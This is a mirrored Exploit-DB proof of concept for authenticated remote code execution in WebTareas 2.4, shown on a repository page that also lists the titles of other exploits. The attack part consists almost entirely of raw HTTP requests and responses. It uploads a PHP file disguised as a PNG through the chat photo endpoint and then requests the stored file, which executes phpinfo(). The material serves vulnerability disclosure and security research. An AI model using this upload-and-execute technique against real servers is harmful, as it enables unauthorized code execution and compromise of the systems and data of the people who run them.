bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51089.txt
Exploit-DB b137003172 DB: 2023-03-28 
36 changes to exploits/shellcodes/ghdb

MiniDVBLinux 5.4  - Change Root Password
MiniDVBLinux 5.4  - Remote Root Command Injection
MiniDVBLinux 5.4 - Arbitrary File Read
MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
MiniDVBLinux <=5.4  - Config Download Exploit

Desktop Central 9.1.0 - Multiple Vulnerabilities

FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
Aero CMS v0.0.1 - PHP Code Injection (auth)
Aero CMS v0.0.1 - SQL Injection (no auth)

Atom CMS v2.0 - SQL Injection (no auth)
Canteen-Management v1.0 - SQL Injection
Canteen-Management v1.0 - XSS-Reflected

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
WebTareas 2.4 - RCE (Authorized)
WebTareas 2.4 - Reflected XSS (Unauthorised)
WebTareas 2.4 - SQL Injection (Unauthorised)

WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

Grafana <=6.2.4 - HTML Injection

Hex Workshop v6.7 - Buffer overflow DoS

Scdbg 1.0 - Buffer overflow DoS

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

AVS Audio Converter 10.3 - Stack Overflow (SEH)

Explorer32++ v1.3.5.531 - Buffer overflow

Frhed (Free hex editor) v1.6.0 - Buffer overflow

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

Resource Hacker v3.6.0.92 - Buffer overflow

Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
2023-03-28 00:16:27 +00:00

108 lines
No EOL
5 KiB
Text
Raw Blame History

# Exploit Title: WebTareas 2.4 - RCE (Authorized)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example in forum -> members forum -> chat
-----------------------------------------------------------------------------------------------------------------------
Param: chatPhotos0
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /webtareas/includes/chattab_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126
Content-Length: 6852
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="action"
sendPhotos
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatTo"
2
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatType"
P
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"
Content-Type: image/png
PNG
[...]
<?php phpinfo();?>
[...]
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:27:41 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 661
Connection: close
Content-Type: application/json
{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}
-----------------------------------------------------------------------------------------------------------------------
See link: /files\/Messages\/7.php
-----------------------------------------------------------------------------------------------------------------------
Req:
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/files/Messages/7.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:28:16 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89945
[...]
<title>PHP 7.4.30 - phpinfo()</title>
[...]
<h1 class="p">PHP Version 7.4.30</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr>
<tr><td class="e">Compiler </td><td class="v">Visual C++ 2017
[...]
Reference in a new issue View git blame Copy permalink